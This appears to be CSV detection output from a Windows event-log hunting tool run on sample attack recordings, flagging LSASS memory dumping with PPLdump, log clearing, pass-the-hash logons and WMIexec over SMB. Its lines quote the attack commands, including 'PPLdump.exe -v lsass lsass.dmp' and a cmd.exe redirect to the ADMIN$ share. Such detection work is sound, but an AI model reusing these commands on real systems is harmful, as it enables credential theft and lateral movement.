2021-04-23 07:09:25.418 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:25.427 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1400 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 592 | Tgt PGUID: 747F3D96-6E19-6082-0000-0010885D0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: PPLdump.exe -v lsass lsass.dmp | LID: 0x3e7 | PID: 7188 | PGUID: 747F3D96-F416-6081-0000-001033034A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.083 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x103801 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 7188 | Tgt PGUID: 747F3D96-F416-6081-0000-001033034A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.084 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 504 | Src PGUID: 747F3D96-6E19-6082-0000-0010E5580000 | Tgt PID: 7188 | Tgt PGUID: 747F3D96-F416-6081-0000-001033034A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\Desktop\lsass.dmp | Process: C:\Windows\system32\services.exe | PID: 7188 | PGUID: 747F3D96-F416-6081-0000-001033034A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 7188 | Src PGUID: 747F3D96-F416-6081-0000-001033034A00 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7188 | Src PGUID: 747F3D96-F416-6081-0000-001033034A00 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.307 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\PPLdump.exe | PID: 6316 | PGUID: 747F3D96-F415-6081-0000-001040FE4900,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:27.649 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 424 | Src PGUID: 747F3D96-6E19-6082-0000-0010A5530000 | Tgt PID: 6972 | Tgt PGUID: 747F3D96-F417-6081-0000-0010661D4A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:27.653 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 504 | Src PGUID: 747F3D96-6E19-6082-0000-0010E5580000 | Tgt PID: 6972 | Tgt PGUID: 747F3D96-F417-6081-0000-0010661D4A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:35.260 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\lsass.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 652 | Src PGUID: 747F3D96-6E19-6082-0000-001070650000 | Tgt PID: 624 | Tgt PGUID: 747F3D96-6E19-6082-0000-0010F6600000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 6644 | PGUID: 747F3D96-F41F-6081-0000-001078834A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 624 | Src PGUID: 747F3D96-6E19-6082-0000-0010F6600000 | Tgt PID: 6644 | Tgt PGUID: 747F3D96-F41F-6081-0000-001078834A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 19:09:46.214 +09:00,srvdefender01.offsec.lan,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:10:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x3cc | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-26 17:25:31.043 +09:00,srvdefender01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.258 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0xd44 | User: SRVDEFENDER01$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.313 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.325 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.329 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.332 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.335 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.338 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.342 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.344 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.348 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.350 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.354 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.356 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.360 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.363 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.367 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.369 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.373 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.375 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.379 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.381 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.388 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.391 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.394 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
